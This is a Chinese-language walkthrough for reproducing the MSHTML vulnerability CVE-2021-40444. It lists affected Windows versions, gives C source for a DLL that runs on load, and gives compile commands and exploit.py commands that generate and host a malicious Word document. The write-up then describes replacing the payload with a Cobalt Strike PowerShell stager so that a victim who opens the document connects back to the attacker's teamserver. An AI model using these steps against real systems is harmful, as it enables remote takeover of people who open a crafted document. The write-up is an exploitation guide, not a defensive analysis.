CVE-2021-40444复现

(Updated: )

前言

微软MSHTML引擎存在代码执行漏洞,攻击者通过精心制作包含恶意ActiveX的Offcie文档,诱导用户打开,从而实现远程代码执行。当用户主机启用了ActiveX控件,攻击者可通过该漏洞控制受害者主机。

影响范围

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
WindowsServer,version20H2(ServerCoreInstallation)
WindowsServer,version2004(ServerCoreinstallation)
WindowsServer2022(ServerCoreinstallation)
WindowsServer2022
WindowsServer2019(ServerCoreinstallation)
WindowsServer2019
WindowsServer2016(ServerCoreinstallation)
WindowsServer2016
WindowsServer2012R2(ServerCoreinstallation)
WindowsServer2012R2
WindowsServer2012(ServerCoreinstallation)
WindowsServer2012
WindowsServer2008forx64-basedSystemsServicePack2(ServerCoreinstallation)
WindowsServer2008forx64-basedSystemsServicePack2
WindowsServer200832-bitSystemsServicePack2(ServerCoreinstallation)
WindowsServer200832-bitSystemsServicePack2
WindowsServer2008R2forx64-basedSystemsServicePack1(ServerCoreinstallation)
WindowsServer2008R2forx64-basedSystemsServicePack1
WindowsRT8.1
Windows8.1forx64-basedsystems
Windows8.132-bitsystems
Windows7forx64-basedSystemsServicePack1
Windows732-bitSystemsServicePack1
Windows10forx64-basedSystems
Windows1032-bitSystems
Windows10Version21H1forx64-basedSystems
Windows10Version21H1forARM64-basedSystems
Windows10Version21H132-bitSystems
Windows10Version20H2forx64-basedSystems
Windows10Version20H2forARM64-basedSystems
Windows10Version20H232-bitSystems
Windows10Version2004forx64-basedSystems
Windows10Version2004forARM64-basedSystems
Windows10Version200432-bitSystems
Windows10Version1909forx64-basedSystems
Windows10Version1909forARM64-basedSystems
Windows10Version190932-bitSystems
Windows10Version1809forx64-basedSystems
Windows10Version1809forARM64-basedSystems
Windows10Version180932-bitSystems
Windows10Version1607forx64-basedSystems
Windows10Version160732-bitSystems

漏洞复现

准备calc.c文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include<windows.h>

void exec(void) {
    system("C:\\Windows\\System32\\calc.exe");
    return;
}

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved)
{
    switch(fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            exec();
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

编译为dll文件

1
2
sudo apt-get install gcc-mingw-w64
i686-w64-mingw32-gcc -shared calc.c -o calc.dll

下载POC

下载地址:https://github.com/lockedbyte/CVE-2021-40444

将dll文件放到test目录下替换掉原有文件

利用dll文件生成docx文档

1
2
sudo python3 exploit.py generate test/calc.dll http://<SRVIP>
# SRVIP为服务端IP

生成了out/document.docx、word.html和word.cab

开启web服务

1
sudo python3 exploit.py host 80

把生成的document.docx上传到靶机,打开成功弹出计算器

漏洞利用

我们要目标弹出一个计算器有什么用呢?我们要想办法利用这个漏洞。

上线CS

在kali上启动一个CS

1
sudo ./teamserver 192.168.45.129 123456

再打开客户端

设置一个监听

生成powershell command

修改calc.c,把生成的payload替换,重命名为cs.c

cs.c编译为cs.dll

把生成的cs.dll复制到test目录下,运行脚本生成word文档

开启web服务

1
sudo python3 exploit.py host 80

把生成的文档上传到目标主机并打开,点击”启用编辑”

上线CS成功